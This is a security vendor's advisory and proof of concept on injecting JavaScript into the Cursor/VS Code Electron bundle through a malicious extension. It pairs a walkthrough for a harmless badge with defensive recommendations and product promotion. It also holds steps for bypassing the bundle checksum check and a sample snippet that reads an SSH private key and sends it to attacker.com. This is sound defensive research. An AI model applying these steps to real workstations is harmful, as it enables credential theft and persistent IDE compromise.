Cross icon
Test your LLM for oversharing!  Test for real-world oversharing risks with role-specific prompts that mimic  real workplace questions. FREE - Start Now
protect icon

A new era requires a new set of solutions
Knostic delivers it

Skip to main content
Skip to main content

A JavaScript injection attack on Cursor, facilitated by a malicious extension, can take over the IDE and the developer workstation. While we’re releasing a PoC, and it may even be unique, we’ve seen this kind of attack many times this past year alone. Our purpose is to deep dive into these attacks through the PoC, understand why they continue to work, and suggest defensive approaches. 

Every week, the attack surface against agents, and specifically AI coding assistants, expands. At the same time, threat actor interest is at an all-time high, and attacks are becoming more prevalent. New adversarial research is released every single day.

We must stop and understand these attacks better if we’re to make a dent. Especially when it comes to cyber defense and AppSec, aside from our product at Knostic (wink wink), the industry doesn’t yet have capabilities in this realm.

We attempted to strike a balance between thoroughness and effectiveness, and we hope we made the right choice in keeping the text concise.

Knostic protects your developers and AI coding agents against attacks like this. To learn more, visit https://www.getkirin.com/ 

To start, These Agents are Node.js Interpreters

The underlying attack class, JavaScript execution in Electron/Node context, is not new. Similar injection and extension-abuse techniques have been used in browsers for years. What is new is how quickly and easily adversaries can weaponize those same weaknesses today, thanks to the way AI coding assistants operate.

We show that malicious JavaScript running inside the Node.js interpreter, whether introduced by an extension, an MCP server, or a poisoned prompt or rule, immediately inherits the IDE’s privileges: full file-system access, the ability to modify or replace IDE functions (including installed extensions), and the ability to persist code that reattaches after a restart. Once interpreter-level execution is available, an attacker can turn the IDE into a malware distribution and exfiltration platform.

From a security program management perspective, AI coding assistants also increase the range of supply chain threats organizations must tackle. Traditional IDEs largely relied on vetted extensions, whereas today developers pull MCP servers, extensions, and even simple prompts and rules from unvetted online sources.

Each of these components introduces third-party risks that can disrupt CI/CD pipelines and extend the organizational perimeter to the developer’s workstation. As a result, Cursor, Windsurf, and other VS Code derivatives now sit firmly as a risk in modern supply chain management considerations. Then, operationally, also serve as lateral movement paths between developer workstations, repositories, production systems, vaults, and the corporate network.

Insecure Architecture, Expanded Attack Surface, and an Old Class of Vulnerabilities

Architecturally, Cursor runs on VS Code, which is an Electron app powered by Node.js. There are no effective isolation controls between Node.js and the rest of the system. Therefore, interpreter-level execution can directly call the file system and native APIs. Via Cursor, an attacker can inject JavaScript into the running IDE and alter UI and extension state with trivial user interaction. 

For Electron apps, this vulnerability class is well known. What has changed is that many coding agents are now effectively browsers, introducing these classic vulnerabilities into our CI/CD process.

Moreover, AI coding agents and in-IDE language agents run code and evaluate prompts inside that Node.js context, which significantly increases the number of entry points an attacker can use.

We demonstrate the issue via a crafted malicious extension. However, the same technique also applies to MCP servers and malicious prompts and rules.

What it means

A single malicious extension or otherwise injected script can: 

  • Gain full file-system access

  • Modify or replace installed extensions 

  • Persist code that reattaches after restarts

Because many IDEs are Electron forks of VS Code, exploit patterns carry across multiple assistants and forks. Compromised developer accounts or automated publishing pipelines can accelerate the spread and turn IDEs into malware distribution platforms.

Demonstrating Code Injection

We implement a proof-of-concept malicious extension that does two things in parallel: it injects JavaScript into the running IDE to execute actions, and it manipulates the UI to present a controlled list of extensions. This dual approach shows both the execution capability and the visible, persistent effects an attacker can produce.

For a clear, low-risk demonstration, we inject a harmless UI badge labeled MALICIOUS. The badge is rendered by calling into VS Code’s extension host and updating the DOM via the Electron/Node context. The same minimal code path used to render the badge also permits enumerating and altering installed extensions, writing files, and persisting changes that survive restarts. The demo uses Cursor, but the technique applies to any VS Code/Electron fork.

 Screenshot 1: Shows the original, unmodified version of VS Code

Screenshot 1: Shows the original, unmodified version of VS Code

image (49)Screenshot 2: Shows the malicious badge we added by injecting code into VS Code.

Technical Walkthrough: Bundle Injection 

Perform these steps only in an isolated test machine. Please note this is for controlled security research purposes only. 

Overview

Create a VM or test environment (to prevent code corruption, never use your production machine)

Install a fresh copy of Cursor/VS Code

Create full backup:

cp -R /Applications/Cursor.app /tmp/cursor_backup

Follow the injection steps below in a controlled environment

Document changes and verify detection mechanisms

Destroy the test environment when complete

Step 1: Locate the Bundle Files

On macOS (similar paths exist for Windows/Linux):

/Applications/Cursor.app/Contents/Resources/app/out/vs/workbench/

The key files are:

  • workbench.desktop.main.js (minified JavaScript)

  • workbench.desktop.main.css (minified CSS)

Step 2: Find the Injection Point

The files are minified, so you need to identify the correct location by mapping what you see in the running UI to the original VS Code source.

  1. Inspect the running interface: In Cursor or VS Code, open Help → Toggle Developer Tools → Elements. Right-click the area you want to modify and select Inspect.

    Note the CSS selector (for example, .extension-bookmark-container, .name, or .badge).

  2. Map the CSS selector to the source code: Because the minified version is difficult to read, clone the VS Code repository and search for that selector name to find where it is defined or referenced. Focus on the functions renderTemplate and renderElement, which control how list or tree items are drawn. This helps locate the part of the code that generates the DOM element you inspected.

  3. When the selector isn’t obvious: If you cannot find the selector in the minified bundle, place breadcrumbs (temporary markers) in the upstream VS Code codebase. This allows you to trace which section of the source creates the target element.

  4. Understand the render functions
    If needed, search the VS Code repository to study how renderTemplate and renderElement interact and where CSS selectors are applied. These functions define the template structure and then render the actual elements you see in the UI.

In this example, we injected a badge into the extensions list:

// Located after span.name in the renderTemplate function
A = Ve(f, We("span.malicious-badge"))

Note that these are minified function names, shortened to save space. They change between builds and may differ from what you see in your version. This is why you should always refer to the original VS Code source code rather than relying only on the minified bundle.

See screenshots in step 3 below.

Step 3: Understand the Rendering Functions

VS Code uses two critical functions:

  • renderTemplate: Returns a JSON structure defining UI elements
  • renderElement: Uses the template to actually render the UI

You must:

  1. Add your element to renderTemplate
  2. Include it in the return statement JSON
Reference it in renderElement for actual renderingimage (51)

Screenshot 3: Original VS Code interface before injection 

undefined-Nov-04-2025-03-24-41-6568-PMScreenshot 4: UI after badge injection (demonstration)

Step 4: Bypass Integrity Checks

After modification, VS Code displays a warning: "Installation is corrupt, please reinstall."

To bypass this, recalculate the checksum:

# Calculate new hash dgst -sha256 -binary \

  /Applications/Cursor.app/Contents/Resources/app/out/vs/workbench/workbench.desktop.main.js \

| base64 | tr -d '='

# Update product.json

# Replace value in "checksums.vs/workbench/workbench.desktop.main.js"

Location: /Applications/Cursor.app/Contents/Resources/app/product.json

Step 5: Execution

Restart the application. Your injected code now executes automatically at every launch with full system access, before any security checks run.

Accessing the File System

VS Code exposes a fileService API internally. It handles file access for extensions and internal features. If you would like to access the file system, note that direct require('fs') doesn't work in Electron's renderer process, but VS Code provides fileService:

// Find locations where constructor has fileService=* (* = any letter due to minification)

// Example: Exfiltrating SSH keys

fileService.readFile({path:'/Users/username/.ssh/id_rsa', scheme:'file'})

.then(f => {

// Exfiltrate sensitive data

fetch('https://attacker.com/exfil',
method: 'POST',

 body: f.value.toString()

    });

  })

  .catch(e => {

    // Fail silently

  });

The fileService object is available throughout the codebase. Examine the VS Code repository or search for fileService. to find available methods.

Impact

The supply chain threats facing organizations have expanded as IDEs like VS Code operate with full system privileges, act as fully-fledged browsers that can inadvertently infect themselves, and are actively targeted by attackers.

MCP servers, compromised extensions, prompts, rules, or even simple mistakes can inject malicious code, which runs as a privileged payload. This, in turn, enables attackers to gain access to the file system, and alter the IDE. 

The same Cursor exposure discussed in this advisory also affects other VS Code AI forks such as Windsurf, which share the same Electron-based architecture.

Recommendations for Developers

  • Disable Auto-Run features in your IDE or extensions

  • Grant minimum necessary permissions to extensions and MCP servers

  • Validate all external dependencies before installation:

    • Check GitHub star count and activity

    • Confirm version matches the official repository

    • Match the repository owner with the verified publisher

    • Review open issues and recent PRs for anomalies

    Verify Bundle Integrity:

# Calculate current hash

openssl dgst -sha256 -binary \

  /Applications/Cursor.app/Contents/Resources/app/out/vs/workbench/workbench.desktop.main.js \

| base64 | tr -d '='

# Compare with product.json value

# Mismatch = potential compromise

Recommendations for Security Teams: Hunting Checklist

  1. Monitor bundle file modifications:

    • Monitor workbench.desktop.main.js and product.json.

    • Alert on unauthorized checksum or bundle edits.

  2. Audit extension installations:

    • Review installed extensions, publishers, and update history.

  3. Network and system monitoring analysis:

    • Flag IDE traffic to unknown domains.

    • Watch for unauthorized writes in IDE directories.

  4. Credential scanning:

    • Scan for exposed tokens in IDE configs.

    • Track irregular credential access.

Real-Time Detection with Kirin

In the video below, see how Kirin by Knostic detects a malicious extension the moment it's installed. The user is alerted instantly and guided to remove it, stopping the threat before it spreads. 

Learn More

Knostic protects developers and AI coding agents against attacks like these.
Learn more: https://www.getkirin.com/

Data Leakage Detection and Response for Enterprise AI Search

Learn how to assess and remediate LLM data exposure via Copilot, Glean and other AI Chatbots with Knostic.

Get Access

Mask group-Oct-30-2025-05-23-49-8537-PM

Build Trust and Security into Enterprise AI

Explore how Knostic aligns with Gartner’s AI TRiSM framework to manage trust, risk, and security across AI deployments.

Read the Brief

Image-1

The Data Governance Gap in Enterprise AI

See why traditional controls fall short for LLMs, and learn how to build policies that keep AI compliant and secure.

Download the Whitepaper

data-governance

Rethinking Cyber Defense for the Age of AI

Learn how Sounil Yu’s Cyber Defense Matrix helps teams map new AI risks, controls, and readiness strategies for modern enterprises.

Get the Book

Cyber Defence Matrix - cover
bg-shape-download

See How to Secure and Enable AI in Your Enterprise

Knostic provides AI-native security and governance across copilots, agents, and enterprise data. Discover risks, enforce guardrails, and enable innovation without compromise.

195 1-min
background for career

What’s next?

Want to solve oversharing in your enterprise AI search? Let's talk.

Knostic offers the most comprehensively holistic and impartial solution for enterprise AI search.

protect icon

Knostic leads the unbiased need-to-know based access controls space, enabling enterprises to safely adopt AI.